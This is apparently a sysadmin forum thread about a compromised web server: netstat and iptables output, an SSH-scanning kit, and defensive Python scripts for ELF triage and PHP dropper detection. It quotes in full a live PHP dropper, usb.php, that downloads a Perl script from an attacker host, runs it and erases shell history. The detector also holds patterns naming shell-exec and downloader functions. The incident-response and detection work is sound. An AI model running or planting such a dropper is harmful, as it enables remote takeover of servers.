tcp 0 0 *:imaps *:* LISTEN
tcp 0 0 *:pop3s *:* LISTEN
udp 0 0 *:ndmp *:*
udp 0 0 static.253.54.251.148:domain *:*
udp 0 0 static.252.54.251.148:domain *:*
udp 0 0 host.domain:domain *:*
udp 0 0 localhost:domain *:*
udp 0 0 *:domain *:*
Active UNIX domain sockets (only servers)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 5435045 /var/run/mod_fcgid/1801.10
unix 2 [ ACC ] STREAM LISTENING 5444765 /var/run/mod_fcgid/1801.11
unix 2 [ ACC ] STREAM LISTENING 15061 /var/run/mod_fcgid/1801.5
unix 2 [ ACC ] STREAM LISTENING 10783 /tmp/.s.PGSQL.5432
unix 2 [ ACC ] STREAM LISTENING 11231 private/tlsmgr
unix 2 [ ACC ] STREAM LISTENING 11235 private/rewrite
unix 2 [ ACC ] STREAM LISTENING 9537 /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 9733 /var/run/clamav/clamd.sock
unix 2 [ ACC ] STREAM LISTENING 11239 private/bounce
unix 2 [ ACC ] STREAM LISTENING 7344 @/com/ubuntu/upstart
unix 2 [ ACC ] STREAM LISTENING 12354 /var/run/mod_fcgid/1801.1
unix 2 [ ACC ] STREAM LISTENING 10870 /var/run/dovecot/anvil
unix 2 [ ACC ] STREAM LISTENING 10872 /var/run/dovecot/anvil-auth-penalty
unix 2 [ ACC ] STREAM LISTENING 11243 private/defer
unix 2 [ ACC ] STREAM LISTENING 11247 private/trace
unix 2 [ ACC ] STREAM LISTENING 11251 private/verify
unix 2 [ ACC ] STREAM LISTENING 11255 public/flush
unix 2 [ ACC ] STREAM LISTENING 11259 private/proxymap
unix 2 [ ACC ] STREAM LISTENING 11263 private/proxywrite
unix 2 [ ACC ] STREAM LISTENING 11267 private/smtp
unix 2 [ ACC ] STREAM LISTENING 11271 private/relay
unix 2 [ ACC ] STREAM LISTENING 11275 public/showq
unix 2 [ ACC ] STREAM LISTENING 11279 private/error
unix 2 [ ACC ] STREAM LISTENING 11324 /var/run/proftpd/proftpd.sock
unix 2 [ ACC ] STREAM LISTENING 15090 /var/run/mod_fcgid/1801.6
unix 2 [ ACC ] STREAM LISTENING 5420365 /var/run/mod_fcgid/1801.8
unix 2 [ ACC ] STREAM LISTENING 10830 /var/run/dovecot/login/ssl-params
unix 2 [ ACC ] STREAM LISTENING 12856 /var/run/mod_fcgid/1801.3
unix 2 [ ACC ] STREAM LISTENING 11283 private/retry
unix 2 [ ACC ] STREAM LISTENING 11287 private/discard
unix 2 [ ACC ] STREAM LISTENING 10832 /var/run/dovecot/login/pop3
unix 2 [ ACC ] STREAM LISTENING 11291 private/local
unix 2 [ ACC ] STREAM LISTENING 11295 private/virtual
unix 2 [ ACC ] STREAM LISTENING 28777 /var/run/mod_fcgid/1801.7
unix 2 [ ACC ] STREAM LISTENING 9617 /var/run/acpid.socket
unix 2 [ ACC ] STREAM LISTENING 13314 /var/run/mod_fcgid/1801.4
unix 2 [ ACC ] STREAM LISTENING 11343 /var/run/proftpd/proftpd.sock
unix 2 [ ACC ] STREAM LISTENING 11299 private/lmtp
unix 2 [ ACC ] STREAM LISTENING 11303 private/anvil
unix 2 [ ACC ] STREAM LISTENING 11307 private/scache
unix 2 [ ACC ] STREAM LISTENING 10838 /var/run/dovecot/login/imap
unix 2 [ ACC ] STREAM LISTENING 10844 /var/run/dovecot/doveadm-server
unix 2 [ ACC ] STREAM LISTENING 10846 /var/run/dovecot/dns-client
unix 2 [ ACC ] STREAM LISTENING 10848 /var/run/dovecot/login/dns-client
unix 2 [ ACC ] STREAM LISTENING 10850 /var/run/dovecot/director-admin
unix 2 [ ACC ] STREAM LISTENING 10852 /var/run/dovecot/director-userdb
unix 2 [ ACC ] STREAM LISTENING 10942 /var/run/saslauthd/mux
unix 2 [ ACC ] STREAM LISTENING 10854 /var/run/dovecot/dict
unix 2 [ ACC ] STREAM LISTENING 11224 public/cleanup
unix 2 [ ACC ] STREAM LISTENING 10856 /var/run/dovecot/config
unix 2 [ ACC ] STREAM LISTENING 10858 /var/run/dovecot/login/login
unix 2 [ ACC ] STREAM LISTENING 10860 /var/run/dovecot/auth-login
unix 2 [ ACC ] STREAM LISTENING 10862 /var/run/dovecot/auth-client
unix 2 [ ACC ] STREAM LISTENING 10864 /var/run/dovecot/auth-userdb
unix 2 [ ACC ] STREAM LISTENING 10866 /var/run/dovecot/auth-master
unix 2 [ ACC ] STREAM LISTENING 10868 /var/run/dovecot/auth-worker
unix 2 [ ACC ] STREAM LISTENING 11536 /var/run/fail2ban/fail2ban.sock
unix 2 [ ACC ] STREAM LISTENING 12245 /var/run/mod_fcgid/1801.0
unix 2 [ ACC ] STREAM LISTENING 5421548 /var/run/mod_fcgid/1801.9
unix 2 [ ACC ] STREAM LISTENING 12585 /var/run/mod_fcgid/1801.2
unix 2 [ ACC ] STREAM LISTENING 10719 /var/lib/mysql/mysql.sock

I see several reverse IPs in there unknown to me. Does anybody know those?

The IP tables have the following settings:

iptables -A INPUT -p tcp --dport x000 -j ACCEPT #SSH
iptables -A INPUT -s xx.xx.xx.xx -j ACCEPT #Home
iptables -A INPUT -p icmp --icmp-type 8 -s 213.186.33.13 -j ACCEPT #Ping
iptables -A INPUT -p tcp --dport 443 -j ACCEPT #SSL
iptables -A INPUT -p tcp --dport 80 -j ACCEPT #http
iptables -A INPUT -p tcp --dport 995 -j ACCEPT #POP3 SSL
iptables -A INPUT -p tcp --dport 20050 -j ACCEPT #webmin
iptables -A INPUT -p tcp --dport 20051 -j ACCEPT #usermin
iptables -A INPUT -p tcp --dport 465 -j ACCEPT #SMTP SSL
iptables -A INPUT -p tcp --dport 53 -j ACCEPT #BIN
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -A OUTPUT -p tcp --dport 22 -j DROP #hack attempt
iptables -P OUTPUT ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

I have downloaded the b5.tar file and unpacked it with chmod 000.
Most files can be read and are devised to run a network scan on port 22.
There are, however, 3 files I can't read: ssh2, screen and pscan. They look something like this:

^?ELF^A^A^A^@^@^@^@^@^@^@^@^@^B^@^C^@^A^@^@^@^P<81>^D^H4^@^@^@´<8c>"^@^@^@^@^@4^@ ^@^E^@(^@’^@$^@^A^@^@^@^@^@^@^@^@<80>^D^H^@<80>^D^H<80>Ï^^@<80>Ï^^@^E^@^@^@^@^P^@^@^A^@^@^@^@Ð^^@^@P!^H^@P!^HD÷^@^@4<8d>^A^@^F^@^@^@^@^P^@^@^D^@^@^@Ô^@^@^@Ô<80>^D^HÔ<80>^D^H ^@^@^@ ^@^@^@^D^@^@^@^D^@^@^@^G^@^@^@^@Ð^^@^@P!^H^@P!^H^P^@^@^@0^@^@^@^D^@^@^@^D^@^@^@Qåtd^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^F^@^@^@^D^@^@^@^D^@^@^@^P^@^@^@^A^@^@^@GNU^@^@^@^@^@^B^@^@^@^F^@^@^@ ^@^@^@U<89>å<83>ì^Hè5^@^@^@èÌ^@^@^@è<87>^?^V^@ÉÃ^@^@^@^@^@1í^<89>á<83>äðPTRhà¼^T^Hh ½^T^HQVhú<85>^D^Hè_4^P^@ô<90><90>U<89>åS<83>ì^Dè^@^@^@^@[<81>Ã@&^]^@<8b><93>Üüÿÿ<85>Òt^Eèª~û÷X[ÉÃ<90><90><90><90><90><90>U<89>åS<83>ì^D<80>=dG"^H^@uT¸HP!^H-@P!^HÁø^B<8d>Xÿ¡G"^H9Ãv^_<8d>´&^@^@^@^@<83>À^A£G"^Hÿ^T<85>@P!^H¡`G"^H9Ãwè¸<80>ª^T^H<85>Àt^LÇ^D$Ü^Q^^^HèÃ(^P^@Æ^EdG"^H^A<83>Ä^D[]Ã<8d>¶^@^@^@

Is there any way I can find out what they do without running them?

Now one of the sites has gone down again.
I am getting the following error:

Network Error (dns_server_failure)

Your request could not be processed because an error occurred contacting the DNS server.
The DNS server may be temporarily unavailable, or there could be a network problem.

For assistance, contact your network support team.

I have restarted the DNS server, but this has not helped.

I could not find the issue that caused the websites to become unavailable so I moved all websites to a new server.

Should anybody have any ideas, though, I am keeping the old server up and running for a little while longer so I can do some tests.
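On the three unreadable files: the question is answerable without executing them. What follows is an added example, not code from the thread or from any poster. It parses the ELF header with struct, extracts printable strings the way `strings` does, and greps those for indicators. The sample bytes are constructed: the header copies the leading fields visible in the dump above (0x7f ELF, 32-bit, little-endian, ET_EXEC, EM_386, entry point 0x08048110, program header offset 52) and the rest is fake string data that reuses the download URL from the first post; the indicator word list is my own assumption about what a port-22 scanner kit tends to contain.

```python
"""Static triage of an unknown ELF binary without running it (added example,
not from the thread): header fields via struct, printable strings, and a
grep for indicators. The sample bytes are constructed; the header copies the
leading fields visible in the dump above (0x7f ELF, 32-bit, little-endian,
ET_EXEC, EM_386, entry 0x08048110) and the rest is fake string data.
"""
import hashlib
import re
import struct

ELF_MAGIC = b"\x7fELF"
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
E_MACHINE = {3: "i386", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def parse_elf_header(data):
    """Decode the header fields a triager cares about; ValueError on non-ELF input."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    end = {1: "<", 2: ">"}.get(ei_data)
    if end is None:
        raise ValueError("bad EI_DATA")
    if ei_class == 1:    # ELFCLASS32: e_type, e_machine, e_version, e_entry, e_phoff, e_shoff
        fields = struct.unpack_from(end + "HHIIII", data, 16)
    elif ei_class == 2:  # ELFCLASS64: same fields, 64-bit entry and offsets
        fields = struct.unpack_from(end + "HHIQQQ", data, 16)
    else:
        raise ValueError("bad EI_CLASS")
    e_type, e_machine, _version, e_entry, e_phoff, e_shoff = fields
    return {"class": 32 if ei_class == 1 else 64,
            "endian": "little" if ei_data == 1 else "big",
            "type": E_TYPE.get(e_type, hex(e_type)),
            "machine": E_MACHINE.get(e_machine, hex(e_machine)),
            "entry": e_entry, "phoff": e_phoff, "shoff": e_shoff}


def extract_strings(data, min_len=4):
    """Printable ASCII runs of at least min_len bytes, what `strings` prints."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Indicator patterns (assumed word list for SSH-scanner kits; extend as needed).
IOC_PATTERNS = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "url": re.compile(r"https?://\S+"),
    "scanner": re.compile(r"(?i)\b(?:pscan|scan\.log|ssh2?|libssh|nmap|vuln\.txt|mfu\.txt)\b"),
}


def find_iocs(strings):
    hits = {name: [] for name in IOC_PATTERNS}
    for s in strings:
        for name, rx in IOC_PATTERNS.items():
            hits[name].extend(rx.findall(s))
    return hits


def triage(data):
    """Hash, header and indicators for one binary; the bytes are only parsed."""
    return {"sha256": hashlib.sha256(data).hexdigest(),
            "header": parse_elf_header(data),
            "iocs": find_iocs(extract_strings(data))}


def build_sample():
    """Constructed: a 52-byte ELF32 header with the dump's leading values, then fake strings."""
    ident = ELF_MAGIC + bytes([1, 1, 1, 0]) + b"\x00" * 8   # class32, LSB, version 1, SYSV ABI
    header = ident + struct.pack("<HHIIIIIHHHHHH",
                                 2, 3, 1, 0x08048110, 52, 0,  # ET_EXEC, EM_386, version, entry, phoff, shoff
                                 0, 52, 32, 0, 40, 0, 0)      # flags, ehsize, phentsize, phnum, shentsize, shnum, shstrndx
    body = (b"\x00" * 16 + b"usage: ./pscan <b-block> <port>\x00" + b"scan.log\x00"
            + b"http://81.93.193.221/b5.tar\x00" + b"\xde\xad\xbe\xef")
    return header + body


def triage_file(path):
    with open(path, "rb") as fh:   # read only; the file is never executed
        return triage(fh.read())


if __name__ == "__main__":
    import json
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(json.dumps(triage(data), indent=2))
```

Run it as `python3 elftriage.py /path/to/b5/pscan` on a copy of the kit that is still chmod 000 (the script only reads). On the box the same facts come from `file`, `readelf -h`, `strings -n 6` and `sha256sum`, and the hash can be looked up in a public malware database. For a kit like this the strings alone usually tell the story: the usage banner names the tool, the log file name matches what dns-pool writes, and any hard-coded address is the upload target.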

I had these files (named infi.php) in some folders besides public_html on one WordPress site (v3.8) as well, starting May 11th.
As far as I understand shell scripts, the script dns-pool from the b5 directory scans for open port 22 on several IP addresses built dynamically and sends the result as scan.log (encoded, perhaps) via ssh2 to an unknown server.
Calls for the PHP script infi.php have been made from host 37.151.26.6.
I excluded the address for downloading the b5.tar file and the address used to 'use' infi.php as denied via TCP wrapper.
I stopped some httpd instances (with parameters ed and ted) signed as sync_supers.
Bandwidth monitoring: anyway, I logged tries to send TCP packets to port 22.
They stopped.

May 16th I was able to watch somebody placing a file 'usb.php' in public_html, maybe to have a look for writeable directories via a downloaded Perl script read.txt from http://y.wget.in/. A short time later this host was not reachable any more, so I do not know the content of that file.

Chris,

Thanks for your reply.
I have had the USB file before (contents below).
To stop the attacks from ever happening again on one of my servers I removed the website that allowed the upload of the PHP file.
I understand some CMS systems require unsafe settings of PHP.
Does anybody know more about how to secure a server which is running popular CMS systems like WordPress, Drupal and Joomla?

contents of usb.php

<? $url="http://y.wget.in/";
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
?>
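Both droppers in this thread (infi.php and usb.php) share the same shape: a PHP shell-execution function, a download-and-run chain inside it, a cd into /tmp, and some cleanup. That shape can be scored for, which is what this added example does; it is not code from the thread or from any poster. The weights, the threshold and the word lists are my own choices, and the two sample sources are constructed, the malicious one from fragments of the usb.php posted above and the benign one standing in for a plugin with a legitimate shell call.

```python
"""Score PHP files for the dropper traits seen in infi.php and usb.php
(added example, not from the thread). Weights, threshold and word lists are
my own assumptions; the two sample sources below are constructed.
"""
import os
import re

EXEC_FUNCS = ("exec", "system", "passthru", "shell_exec", "popen",
              "proc_open", "eval", "assert")
DOWNLOADERS = r"(?:curl|wget|fetch|lwp-download|GET|lynx)"
INTERPRETERS = r"(?:perl|python|bash|chmod\s*\+x|nohup)"

# name -> (regex, weight per match)
PATTERNS = {
    # any shell-execution function call, with or without @ suppression
    "exec_call": (re.compile(r"@?\b(?:%s)\s*\(" % "|".join(EXEC_FUNCS)), 1),
    # a downloader followed (same line, within 200 chars) by an interpreter
    "download_then_run": (re.compile(r"\b%s\b.{0,200}?\b%s\b" % (DOWNLOADERS, INTERPRETERS)), 5),
    "tmp_dir": (re.compile(r"\bcd\s+/(?:var/)?tmp\b"), 2),
    "anti_forensics": (re.compile(r"rm\s+-f\s+\$HISTFILE|killall\s+-9|rm\s+-rf\s+\*"), 4),
    "suppression": (re.compile(r"@(?:%s)\s*\(" % "|".join(EXEC_FUNCS)), 2),
    "short_tag": (re.compile(r"<\?(?!php|=)"), 1),
}
THRESHOLD = 8  # assumption: one download-and-run chain plus a little context


def score(src):
    """Per-pattern match counts plus a weighted total for one PHP source."""
    result = {}
    total = 0
    for name, (rx, weight) in PATTERNS.items():
        n = len(rx.findall(src))
        result[name] = n
        total += n * weight
    result["total"] = total
    return result


def is_dropper(src, threshold=THRESHOLD):
    return score(src)["total"] >= threshold


def scan_dir(root, threshold=THRESHOLD):
    """Walk a web root and return (total, path, nonzero counts) for files over threshold."""
    findings = []
    for d, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith((".php", ".phtml", ".php5", ".inc")):
                continue
            p = os.path.join(d, f)
            try:
                with open(p, "r", encoding="utf-8", errors="replace") as fh:
                    s = score(fh.read())
            except OSError:
                continue
            if s["total"] >= threshold:
                findings.append((s["total"], p,
                                 {k: v for k, v in s.items() if v and k != "total"}))
    return sorted(findings, reverse=True)


# Constructed samples. MALICIOUS reuses three statements from the usb.php above.
MALICIOUS = r"""<? $url="http://y.wget.in/";
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
?>"""

BENIGN = r"""<?php
// constructed: a plugin that shells out for a legitimate reason
$out = shell_exec('ls -l ' . escapeshellarg($dir));
echo $_GET['page'];
?>"""


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for total, path, why in scan_dir(sys.argv[1]):
            print(total, path, why)
    else:
        print("usb.php fragment:", score(MALICIOUS))
        print("benign plugin:   ", score(BENIGN))
```

Point it at each site's document root (`python3 phpscore.py /home/site/public_html`) and read the top of the list by hand; a plugin that calls `exec` once will score 1, a dropper like usb.php scores well above the threshold on every statement. This is detection, not prevention. On the prevention side, `disable_functions = exec,passthru,shell_exec,system,popen,proc_open` in php.ini removes the primitives every line of usb.php depends on, and denying execution of .php files inside upload directories keeps a dropped file from being reachable at all; neither replaces patching the CMS or plugin that accepted the upload in the first place.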